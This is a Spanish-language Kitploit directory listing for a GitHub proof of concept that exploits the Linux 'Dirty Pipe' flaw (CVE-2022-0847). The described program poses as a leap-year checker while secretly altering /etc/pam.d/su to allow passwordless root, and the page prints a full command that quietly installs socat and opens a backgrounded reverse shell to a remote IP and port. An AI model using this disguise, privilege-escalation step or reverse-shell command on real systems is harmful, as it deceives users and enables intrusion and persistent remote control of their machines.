Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-0847-Exploit-Implementation — Usando CVE-2022-0847, "Dirty Pipe Exploit", para generar una shell inversa bash para ejecución arbitraria de código en una máquina remota. | Kitploit
Herramientas/GitHubGitHub/joeymeech/cve-2022-0847-exploit-implementation
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónDesarrollo de PayloadsExplotación de Binarios
GitHubjoeymeech/cve-2022-0847-exploit-implementation

CVE-2022-0847-Exploit-Implementation

Usando CVE-2022-0847, "Dirty Pipe Exploit", para generar una shell inversa bash para ejecución arbitraria de código en una máquina remota.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
114hace 3 añosAún no revisado

CVE-2022-0847 - Implementación del Exploit

Esta es una prueba de concepto (POC) que muestra cómo obtener un shell inverso de bash para ejecución arbitraria de código en una máquina remota utilizando CVE-2022-0847, "Dirty Pipe Exploit". Esta vulnerabilidad solo afecta a las versiones del kernel de Linux 5.8 o posteriores, pero fue parcheada en las versiones 5.16.11, 5.15.25, 5.10.102 y superiores. ¡Actualice su kernel! :)

Este exploit fue descubierto por el investigador de seguridad Max Kellermann. No entraré en los detalles de este exploit, ya que él lo hace mucho mejor que yo en su artículo aquí; https://dirtypipe.cm4all.com/

Esta prueba de concepto aparenta ser un simple programa de año bisiesto que te dirá si el año ingresado es bisiesto. En segundo plano, cambio una línea en /etc/pam.d/s Cambio la línea auth sufficient pam_rootok.so por auth sufficient pam_permit.so Este cambio nos permite ejecutar comandos como superusuario sin ingresar una contraseña. Después de esto, simplemente podemos usar la función system() de C para ejecutar comandos como su.

Ejecuto

root@kitploit:~
su -c \"apt-get -y install socat\" > /dev/null; socat TCP4:172.23.46.133:4444 EXEC:/bin/bash & exit

Esta línea instala socat en el sistema y dirige la salida a un archivo nulo para que el usuario no vea la salida de la descarga. A continuación, ejecuto un comando socat para conectarme a una máquina remota con la IP y el puerto especificados. El & coloca este proceso en segundo plano para que después de que el usuario cierre la terminal, la conexión se mantenga.

Ejecutando el programa en una máquina vulnerable:
Imagen de máquina vulnerable

Conectándose a la máquina vulnerable:
Imagen de máquina remota

Descargar herramienta